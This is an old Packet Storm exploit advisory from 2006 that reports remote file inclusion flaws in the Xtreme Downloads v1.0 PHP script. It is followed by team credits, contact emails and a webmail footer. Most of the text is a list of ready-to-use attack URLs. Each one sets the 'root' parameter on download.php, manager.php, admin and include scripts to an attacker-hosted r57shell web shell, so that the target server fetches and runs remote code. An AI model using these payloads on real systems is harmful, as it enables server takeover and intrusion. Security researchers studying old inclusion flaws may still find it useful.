xtreme10.txt

2006-06-12T00:00:00
ID PACKETSTORM:47222
Type packetstorm
Reporter black-code
Modified 2006-06-12T00:00:00

Description

                                        
                                            `Multiple file include exploits in Xtreme Downloads v.1.0  
  
script type : Xtreme Downloads v.1.0  
bug found by : sweet-devil & black-code  
team : site-down  
type : file include  
  
####################################################  
  
exploits :  
  
  
download.php  
  
http://www.example.com/path/download.php?root=http://yoursite/r57shell.txt?  
  
manager.php  
  
http://www.example.com/path/manager.php?root=http://yoursite/r57shell.txt?  
  
/admin/scripts/category.php?  
  
http://www.example.com/path/admin/scripts/category.php?root=http://yoursite/r57shell.txt?  
  
/includes/add_allow.php?  
  
http://www.example.com/path/includes/add_allow.php?root=http://yoursite/r57shell.txt?  
  
/admin/index.php  
  
http://www.example.com/path/admin/index.php?root=http://yoursite/r57shell.txt?  
  
/admin/login.php  
  
http://www.example.com/path/admin/admin/login.php?root=http://yoursite/r57shell.txt?  
  
####################################################  
  
  
#######################  
emails:  
  
gamr-14@hotmail.com & black-cod3@hotmail.com  
#######################  
  
  
All my respect to our friends , lezr.com , g123g.net  
  
  
done .. peace  
  
_________________________________________________________________  
Express yourself instantly with MSN Messenger! Download today it's FREE!   
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/  
  
`